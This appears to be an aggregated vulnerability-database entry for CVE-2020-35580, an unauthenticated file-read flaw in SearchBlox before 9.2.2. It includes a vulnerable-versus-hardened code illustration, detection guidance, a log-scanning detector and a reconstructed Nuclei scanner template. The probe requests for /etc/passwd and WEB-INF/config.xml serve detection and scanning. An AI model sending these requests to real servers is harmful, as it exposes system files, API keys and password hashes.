CVE-2020-35580
Published 2021-05-20
Priority: P1 (78) · Severity: high · CVSS 3.1 base score 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploited in the wild (VulnCheck KEV)
EPSS: 13.98% (96.1th percentile)
A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin's API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
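The bug class behind this CVE is a file-serving handler that opens whatever path arrives in a request parameter. The following is an added illustration, not SearchBlox's code and not the patched FileServlet: a hypothetical `vulnerable_read` that takes the `url` value verbatim, beside a `hardened_read` that resolves the candidate path and refuses anything outside a document root. The sandbox directory and file contents are constructed so the example runs offline.

```python
import os
import tempfile


def make_sandbox():
    """Build a throwaway layout: <root>/docroot/public.txt (legitimate) and
    <root>/config.xml (sensitive, outside docroot). All contents are constructed."""
    root = tempfile.mkdtemp(prefix="fileservlet-demo-")
    docroot = os.path.join(root, "docroot")
    os.makedirs(docroot)
    with open(os.path.join(docroot, "public.txt"), "w", encoding="utf-8") as f:
        f.write("public document\n")
    secret = os.path.join(root, "config.xml")
    with open(secret, "w", encoding="utf-8") as f:
        f.write("<config apikey='CONSTRUCTED-NOT-REAL'/>\n")
    return docroot, secret


def vulnerable_read(url_param):
    """The bug class (hypothetical, not SearchBlox's code): the file name comes
    straight from the request parameter, so any path the service account can
    read, /etc/passwd or WEB-INF/config.xml included, is returned to the caller."""
    with open(url_param, "r", encoding="utf-8") as f:
        return f.read()


def hardened_read(docroot, url_param):
    """Serve only files that still resolve inside docroot after symlinks and
    '..' segments have been resolved."""
    if "\x00" in url_param or os.path.isabs(url_param):
        raise PermissionError("absolute paths and NUL bytes are rejected")
    base = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(base, url_param))
    # commonpath rather than startswith: '/srv/docroot' must not accept '/srv/docroot2/x'.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes the document root")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(url_param)
    with open(candidate, "r", encoding="utf-8") as f:
        return f.read()


def escape_rejected(docroot, url_param):
    """True when hardened_read refuses url_param; used to exercise the containment check."""
    try:
        hardened_read(docroot, url_param)
    except PermissionError:
        return True
    return False
```

The containment check is done after `os.path.realpath`, so an encoded or symlinked detour to `../config.xml` is rejected on the resolved path, not on the string the client sent.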
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| searchblox | searchblox | < 9.2.2 | 9.2.2 |
Detection & IOCs (extracted from sources)
Path: /searchblox/servlet/FileServlet?col=9&url=/etc/passwd
- Detect LFI exploitation attempts targeting the SearchBlox FileServlet by monitoring GET requests to the path /searchblox/servlet/FileServlet with a 'url=' parameter, especially those referencing sensitive OS files like /etc/passwd or config paths like WEB-INF/config.xml.
- A successful exploitation response body will contain the Unix passwd file pattern 'root:.*:0:0:'; use this regex to detect successful LFI data exfiltration in HTTP response bodies.
- Monitor for unauthenticated access to searchblox/WEB-INF/config.xml via the FileServlet, as this file contains the Super Admin API key and base64-encoded SHA1 password hashes of all SearchBlox users.
- The vulnerability affects all SearchBlox versions before 9.2.2. The LFI is exploitable without authentication, meaning no session cookie or API key is required to trigger the issue.
- Successful exploitation of this LFI can yield the Super Admin API key and base64-encoded SHA1 hashes of all user passwords from config.xml, enabling further account compromise beyond file disclosure.
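The detection guidance above, turned into code as an added example (not a rule shipped by any of the sources indexed here): it parses combined-format access-log lines, flags FileServlet requests that carry a `url=` parameter, escalates those that point at the targets named on this page or that traverse upward, and applies the `root:.*:0:0:` success regex to a response body. The log lines and response body are constructed samples, not captured traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

FILESERVLET_PATH = "/searchblox/servlet/FileServlet"
# Targets called out on this page: the OS password file and the SearchBlox config file.
SENSITIVE_TARGET = re.compile(r"/etc/passwd|WEB-INF/config\.xml", re.IGNORECASE)
# Success indicator from this page: a Unix passwd entry for root in the response body.
PASSWD_SUCCESS = re.compile(r"root:.*:0:0:")
# Combined-log-format line: client, timestamp, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed access-log sample: two probes from one client, one benign
# FileServlet download, and one unrelated request.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [20/May/2021:10:01:02 +0000] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 200 1342 "-" "curl/7.68.0"
203.0.113.7 - - [20/May/2021:10:01:05 +0000] "GET /searchblox/servlet/FileServlet?col=9&url=..%2F..%2FWEB-INF%2Fconfig.xml HTTP/1.1" 200 5120 "-" "curl/7.68.0"
198.51.100.4 - - [20/May/2021:10:02:00 +0000] "GET /searchblox/servlet/FileServlet?col=9&url=docs/report.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
198.51.100.9 - - [20/May/2021:10:03:00 +0000] "GET /searchblox/servlet/Search?query=test HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
"""

# Constructed response body for the successful case (not from a real host).
SAMPLE_LEAKED_BODY = "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n"


def classify_request(line):
    """Return a finding dict for FileServlet requests carrying url=, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != FILESERVLET_PATH:
        return None
    # parse_qs percent-decodes, so an encoded '..%2F' traversal is normalised before matching.
    url_values = parse_qs(parts.query).get("url")
    if not url_values:
        return None
    url = url_values[0]
    if SENSITIVE_TARGET.search(url) or "../" in url or url.startswith("/"):
        verdict = "lfi_attempt"
    else:
        verdict = "fileservlet_url_request"  # worth logging, not an attack on its own
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "url": url,
        "status": int(m.group("status")),
        "verdict": verdict,
    }


def scan_access_log(text):
    """Classify every line of an access log; lines that do not match are dropped."""
    return [f for f in (classify_request(line) for line in text.splitlines()) if f]


def exfil_succeeded(response_body):
    """True when a response body looks like a leaked passwd file."""
    return PASSWD_SUCCESS.search(response_body) is not None


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
    print("leak detected:", exfil_succeeded(SAMPLE_LEAKED_BODY))
```

The request-side check alone only proves an attempt; pairing it with the response-body regex (from a WAF, proxy or full-packet capture that retains bodies) is what separates a scanner probe from a confirmed read of /etc/passwd. A hit on WEB-INF/config.xml should be treated as credential exposure, since that file holds the Super Admin API key and the users' password hashes.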
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| NVD | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| VulnCheck | | 7.5 | HIGH | |
GHSA
GHSA-rxfx-hr79-qv8h (unreviewed, 2022-05-24) · CVE-2020-35580 [HIGH] · CWE-522 (Insufficiently Protected Credentials; GHSA classifies by the credential exposure, whereas VulnCheck below files the same bug under CWE-22 Path Traversal)
Title: A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9
Description: identical to the NVD description above.
VulnCheck
vulncheck · 2020 · CVSS 7.5 · CVE-2020-35580 [HIGH]
Title: searchblox searchblox Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Description: identical to the NVD description above.
Affected: searchblox searchblox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https:/
No detection rules found.
Nuclei
nuclei · CVSS 7.5 · CVE-2020-35580 [HIGH]
Title: SearchBlox <9.2.2 - Local File Inclusion
SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
Template (the indexed copy is cut off mid-description; the description is completed from the Nuclei text above, and the request and matcher are reconstructed from the path and success regex listed under Detection & IOCs):

```yaml
id: CVE-2020-35580
info:
  name: SearchBlox <9.2.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
# Request and matcher reconstructed from this page's Detection & IOCs (probe path and 'root:.*:0:0:' regex).
requests:
  - method: GET
    path:
      - "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
```
No writeups or analysis indexed.